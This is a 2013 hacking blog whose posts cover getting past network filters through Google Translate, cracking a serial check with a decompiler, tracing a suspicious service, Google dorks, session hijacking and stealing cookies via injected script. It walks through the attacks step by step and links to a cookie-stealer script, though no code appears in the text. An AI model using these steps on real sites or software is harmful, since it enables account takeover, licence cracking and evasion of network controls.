Sunday, 15 September 2013

Hide your shadow and bypass the security: Part 2

Hey Friends,
Today I am going to show you a  method by which you can access websites blocked by your network administrator.

Before you go through this tutorial also try to check the first tutorial of the security bypass :

Here is the link : http://oxhat.blogspot.in/2012/10/hide-your-shadow-and-bypass-security.html

The advantage of this technique is that page loads faster compared to tor or other proxy software.It also bypass the gstatic filtering/blocking.

Gstatic.com is a domain used by Google which is an other company that is part of a network of sites, cookies, and other technologies used to track you, what you do and what you click on, as you go from site to site, surfing the Web 

Step 1. Go to translate.google.com. 


Step 2. Select translation from English to Chinese / any other language , but not English !! 




Now click the translate button





 Now Click the show original button on the right side  and you will be able to get the desired  version in English .




Sometimes you need to do this immediately while the page is partially loaded. so that new requests are not sent further.

                                                                           Thanks

Thursday, 4 July 2013

Hacking C codes.The Dark Art of Reverse Engineering Part 1

Hacking C codes.
The Dark Art of Reverse Engineering Part 1: Decompile


You may or may not have used some sort of cracks ,keygens ,patches etc at some  point in your life. Have you ever thought how they are developed ? . Today in this tutorial I am going to demonstrate you the "dark art of reverse engineering"

Now before I begin I must say that Reverse Engineering is really a tough , tedious job. It requires huge amount of time.To learn reverse engineering one must show enough dedication and patience.The tutorial that I am going to demonstrate took about a hell lot of time to disassemble ,decompile and interpret the outputs.

okay so lets begin..

Caution:
This tutorial should be used for educational purpose only. I won't be responsible if you misuse this techniques and get yourself in trouble.Reverse Engineering  any software without the permission of owner's permission is treated as an illegal activity.
The software which I will be hacking as a part of the demo is developed by me.

Tools Required
  • Any Linux Distro
  • Any C executable file
  • RecStudio
Prerequisites 
  • Knowledge of C programming
  • Knowledge of ASM(not Required for this tutorial but will be helpful for Part II onward )
So the scenario goes like this.

A game developer Mr Coder has developed a game.To make sure that there is no software piracy he decides to develop it in such a way that the serial key is asked every time someone starts the game.So this is the piece of code he wrote



To make sure his code works Mr Coder runs a check and tests the output




Now he is pleased that none can have a pirated copy. So Mr Coder starts selling the hello.o file along with the serial and at the same time he keeps his source code away so that no one can read the source code.


 Somehow a cracker called Mr Cracker got the hello.o file but neither he has the serial nor he is willing to buy the game.So what to do ??? Mr Cracker decides to hack the game instead .


So he fires the RecStudio and opens the hello.o file with it . Here it how the hello.o file looks after its loaded in RecStudio



This is the ASM version of the code which is just disassembled from the executable hello.o file.


Now he finds the various segments in the Project Tab to find the equivalent decompiled code.

Now Mr Cracker goes on checking each and every decompiled code. Suddenly he encounters the main function and checking the decompiled code he found something interesting  ;) .





If we have a look at the highlighted code we find that the error message  "Not a valid serial .." is displayed when the values of _v8 and _v12 does not match. He found from above that the value of _v8 is 1234 which is compared with certain variable and the error message is generated when the results does not match.So this could be the serial.


So he enters the value 1234 when he is asked for the serial and he gets access to the game. Congos !!!


In the next tutorial I will explain you how the ASM codes can be used to perform the same operation.And in later tutorials I will explain how to make the crack for this game.

                                                    Thank You

Tuesday, 25 June 2013

Tracking Down the Culprit PandoraService.exe

Tracking Down the Culprit PandoraService.exe

Sometimes when you monitor the net usage you might have come across some weird net usage.You might have said "How the hell did such bandwidth consumption occur ?"

Yes sometimes it happens. Today I am going to show you how you can encounter such problems and bring out solutions for such problems.



Here is a simple scenario that I am going to explain and demonstrate.This cannot be categorized as a tutorial but rather a method how you can find out more about services that consumes extensive bandwidth..I guess if  you read this you can also take down such culprits too in a similar way.So here we go




 I was playing around with Wireshark for a while,analyzing the packets in network.All of a sudden I noticed something weird in the traffic of the network.I found that lots of TCP-SYN packets are being sent from my local ip to a remote ip having an address 111.111.111.111.







I checked the inboud and outbound connections  I found some more traffic which is directed to port 80 of 111.111.111.111. I found out that an "innocent" little program PandoraService.exe was involved in this.
 I have seen this thing for some while but I never understood its origin as well its purpose.

So I browsed http://whois.domaintools.com/ to find more about this IP.

The IP seemed to be from Japan.It was the server of Japan Network Information Center. But still I was not fully convinced with this result.




I wanted to dig something more out.So I asked my 'old friend' Google about this ip. 

And here is an interesting post from avast forum that drew my attention which stated that


"The address for this service  Process: pandoraservice.exe, not related to Pandora av but actually a hidden service that was installed 
by the open source video viewer, KMPlayer,
was blocked by MBAM just because it was related to Zeus. 
Probably the host has finally removed it, so MBAM is considering to remove the IP block, "




Believe it or not indeed my KMPlayer was on !!! 


I checked the process from task manager and I found the devil 
PandoraService.exe ! :D

On shutting down the process I found the traffic from 
 111.111.111.111 was simply neutralized !!! 

Wednesday, 29 May 2013

Google Dorks (Google Hacking) Part I




Google Dork are the quickest way to retrieve the results from google

 Google hacking is a technique of using Google Search to find security holes in the configuration and vulnerability  present in websites,web server,security cameras,etc"


 CAUTION
"This tutorial should be used for educational purpose only. I won't be responsible if you misuse this techniques and get yourself in trouble."

In this tutorial I am going to cover the basics of google dorks

The Google Dorks Tutorial is divided in multiple parts . In this first part we will get acquainted with basics of google dorking and the "harmless" use of google dorks. So enjoy the tutorial .





Here are the few examples of google dorks 


  • inurl:java                           displays java' in the url
  • dns site:example.com    restricts the"dns" results to websites in a given domain.
  • php filetype:pdf        displays links of downloadable PDF files  having php in the url/body
  • allintext:google         displays results having"google" in body  or URL
  • php ext:ppt                 displays ppt files of php with downloadable links
  • link: php                        displays pages with *.php links


U can also combine them to get more flexible results


Wednesday, 27 February 2013

Session Hijacking and Fixation


Session hijacking basically refers to hijacking a server's particular session where as Session Fixation means authenticating a user without invalidating any existing session identifier gives an attacker the opportunity to steal authenticated sessions.

The combined attack of  Session Hijacking and Session Fixation gives a malicious user full access as an authenticated use.

Web Applications requires Cookies to store temporary data. Sometimes these cookies stores session ID of a logged in user.This enables the user to be uniquely identified by the server till he logs out and the session is being destroyed.


The attack can be represented as follow




For this demonstration I am using 

  • Firefox Browser ( Attacker )
  • Comodo IceDragon Browser ( Victim )
  • Tamper data ( Firefox Addon )
  • This tutorial requires Cookie Stealing Methods. If you dont know about it check my previous post.
                                                                             CAUTION
"This tutorial should be used for educational purpose only. I won't be responsible if you misuse this techniques and get yourself in trouble.Performing such attacks without the permission of the owner can lead to serious trouble."



Let the attacker user first logs in using his own credentials

 Now this is the information displayed about the attacker after logging in



Now the attacker goes to a forum and inject the malicious script 





What exactly happen at this level is that the script injected contains a redirection to a cookie stealer script.This cookie catcher script stores the cookie information in a log file and later this log file is used to extract the information about the cookies. After injecting the code the attacker waits for the victim to log and enter the  forum.

Now the victim  logs in

 Now this is the information displayed about the victim after logging in



Once the victim enter the forum page the cookies are retrieved and the page is redirected to the cookie catcher page and the cookie information  gets logged in the log file



Now the attacker copies this session ID and manipulates his existing session ID with the hijacked  session ID.



And now if the attacker checks the information then he will find that the  information of the user will be displayed whose session has been hijacked . That means the attacker has hacked into the account of another user as a authentic user.



Thank You




Tuesday, 15 January 2013

Web Application Hacking : Cookie Stealing

Cookie Stealing

                                 Cookies are small datas (usually 4KB in size) that are stored in clients browser . They are usually generated at the server by the server side scripting language . After that they are sent back and stored at the client browser.They help in tracking necessary information like the time of access,username,session information,etc of the client who is logged into a particular website  

                                 In this tutorial I am going to show how cookies are being stolen and logged into a separate file.


                                                                      CAUTION
"This tutorial should be used for educational purpose only. I won't be responsible if you misuse this techniques and get yourself in trouble.Performing such attacks without the permission of the owner can lead to serious trouble."


                                Here is the HTML code of the login form of a sample application.



Now I need to write a server side scripting language to generate cookies to store username and password for a particular user in the browser .


The above piece of code is written in PHP and it does two work

  • It generates cookies
  • It includes a file containing the comments of the users.
                           Now I need one more thing i.e a cookie stealing script.
Download here :https://github.com/dibsy/codesec/blob/master/cookieStealer.php 

Now I am going to place the cookie stealing script and the log file at a remote server or may upload to a hosting website.

Now say suppose there is a forum which allows users to post their comments.Say for examples some thing like this
Now I am going to inject some codes here. I am going to redirect the cookies to a cookie stealing script in this way.



Now my script is ready to accept and log any sort of cookies that are stored in the browser  of any client whoever is trying to access the comment section.

Now say someone logs into his/her account

username=admin
password=password


And now if I check the log file of the cookies where the cookies are stored then I can find my cookies logged



------------------------------------ Thanks for reading----------------------------------